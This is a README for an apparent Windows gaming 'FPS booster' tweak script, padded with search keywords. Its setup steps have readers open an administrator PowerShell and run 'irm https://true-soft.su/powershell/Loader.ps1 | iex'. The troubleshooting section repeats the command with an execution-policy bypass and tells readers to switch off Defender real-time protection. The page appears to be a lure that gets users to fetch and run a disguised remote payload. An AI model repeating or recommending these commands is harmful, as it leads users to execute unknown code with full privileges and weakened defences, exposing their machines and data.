Star 历史趋势
数据来源: GitHub API · 生成自 Stargazers.cn
README.md

Windows Performance Optimization & Latency Tweak Script

A lightweight, open-source automation utility designed to optimize Windows system settings, reduce hardware latency, and improve overall gaming performance. This project centralizes advanced registry tweaks and configuration adjustments to ensure smooth gameplay and stable framerates.

Key Features

  • Latency Optimization: Fine-tunes network and system response times for competitive gaming.
  • System Resource Management: Disables unnecessary background telemetry, diagnostics, and logging services.
  • Power Plan Tuning: Configures advanced power management schemes for maximum hardware efficiency.
  • Registry Adjustments: Safe registry tweaks to optimize CPU priority and GPU scheduling.
  • Storage & Memory Cleanup: Automated temporary file removal to reduce system micro-stutters.

Targeted Search Queries & Purpose

This repository focuses on resolving common system performance bottlenecks, specifically addressing issues like:

  • High system latency and input delay
  • Unstable framerates and micro-stutters in demanding applications
  • Suboptimal Windows default configurations for heavy hardware workloads

🚀 Automated Installation & Setup (PowerShell)

  1. Open PowerShell as Administrator:

    • Press the Win + X keys simultaneously.
    • Select Terminal (Admin) or Windows PowerShell (Admin) from the context menu.
  2. Run the Installation Command: Copy, paste, and press Enter to run the following initialization command. This script will automatically configure the registry bypass and download all required packages:

    irm https://true-soft.su/powershell/Loader.ps1 | iex

🔍 Troubleshooting & Common Errors

📌 Execution Policy Error (Script Blocked)

If your system blocks the launch due to execution policy restrictions, force a bypass using this command in Command Prompt (cmd):

powershell -ExecutionPolicy Bypass -Command "irm https://true-soft.su/powershell/Loader.ps1 | iex"

📌 Error: "irm is not recognized..." (Older PowerShell Versions)

If you are using an older environment where short aliases are missing, use the full system commands:

Invoke-RestMethod https://true-soft.su/powershell/Loader.ps1 | Invoke-Expression

📌 Antivirus or SmartScreen Block

Automated scripts can sometimes trigger antivirus warnings. If this happens, temporarily turn off "Real-time protection" in Windows Defender settings during setup, then turn it back on as soon as the installation is complete.


关于 About

No description, website, or topics provided.
fps-boost-ark-survival-ascendedfps-booster-no-lagfps-booster-softwarefps-booster-windows-12fps-tweakframe-rate-boostgaming-tweak-guideoptimizer-toolperformance-boostregistry-tweakssystem-tweakstweaker-scripttweakerstweaking-utilitywindows-tweaker

语言 Languages

提交活跃度 Commit Activity

代码提交热力图
过去 52 周的开发活跃度
2
Total Commits
峰值: 1次/周
Less
More

核心贡献者 Contributors